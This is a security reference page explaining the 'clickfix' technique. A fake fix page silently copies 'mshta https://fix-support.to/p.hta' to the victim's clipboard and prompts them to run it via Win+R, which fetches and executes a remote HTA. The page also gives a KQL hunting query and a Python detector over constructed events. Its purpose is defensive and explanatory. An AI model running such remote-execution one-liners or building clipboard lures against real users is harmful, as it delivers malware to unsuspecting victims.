Clickfix MSHTA

Execute a remote HTA (HTML Application) via mshta. Commonly delivered by clickfix. The HTA can run PowerShell, download payloads, or perform other actions.

This command runs on Windows
Example Command breakdown
mshta https://fix-support.to/p.hta
1. HTA host: mshta

Built-in Windows binary (LOLBin) that runs HTML Applications and VBScript. Trusted process, often whitelisted.

2. Remote HTA URL: https://fix-support.to/p.hta

URL of the attacker-controlled HTA file. mshta fetches it and executes the VBScript/JScript inside.

How it works
The attack chain from victim execution to payload delivery
  1. Victim runs the command

    The mshta one-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to press Win+R, Ctrl+V, and Enter.

  2. Fetch and execute HTA

    mshta fetches the HTA from https://fix-support.to/p.hta and executes it. No download dialog. The HTA contains VBScript or JScript that can run PowerShell, download payloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • LOLBin. mshta is a built-in Windows binary. Trusted process name, often whitelisted by security tools.
  • No download dialog. Unlike a browser download, mshta fetches and runs in one step. Less user friction.
  • Full script control. The HTA can contain any VBScript/JScript. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the HTA on the server. No need to redistribute links or documents.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to run the command via Win+R, Ctrl+V, Enter.

Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Hunting
Detection queries for mshta with remote URL
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "mshta.exe"
  and ProcessCommandLine contains "http"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine
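
The same hunt as an added example (not part of the original page), written in Python over constructed process-creation events shaped like DeviceProcessEvents rows. It tightens the match from "contains http" to an actual http(s):// URL and, as an assumption, treats an explorer.exe parent as consistent with a Win+R launch; the RunDialogLikely field and the sample events are made up for illustration.

```python
import re
from urllib.parse import urlsplit

# An http(s) URL anywhere in the command line, stopping at whitespace or quotes.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def hunt_remote_mshta(events):
    """Return one finding per mshta.exe launch whose command line holds an http(s) URL."""
    findings = []
    for ev in events:
        # Case-insensitive, like the =~ operator in the query above.
        if ev.get("FileName", "").lower() != "mshta.exe":
            continue
        match = URL_RE.search(ev.get("ProcessCommandLine", ""))
        if not match:
            continue  # local .hta, or a path that merely contains "http"
        url = match.group(0)
        parent = ev.get("InitiatingProcessFileName", "").lower()
        findings.append({
            "DeviceName": ev["DeviceName"],
            "Url": url,
            "Host": urlsplit(url).hostname,
            # Assumption: explorer.exe as parent is consistent with the Run dialog.
            "RunDialogLikely": parent == "explorer.exe",
        })
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"DeviceName": "ws-01", "FileName": "mshta.exe",
     "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "mshta https://fix-support.to/p.hta"},
    {"DeviceName": "ws-02", "FileName": "MSHTA.EXE",
     "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": '"C:\\Windows\\System32\\mshta.exe" "HTTP://fix-support.to/p.hta"'},
    {"DeviceName": "ws-03", "FileName": "mshta.exe",
     "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "mshta C:\\tools\\httpd\\status.hta"},
    {"DeviceName": "ws-04", "FileName": "curl.exe",
     "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "curl.exe https://example.com/health"},
]

if __name__ == "__main__":
    for finding in hunt_remote_mshta(SAMPLE_EVENTS):
        print(finding)
```

Findings with RunDialogLikely set are the ones that best fit the paste-into-Win+R flow described above; the others are still remote HTA executions and worth reviewing.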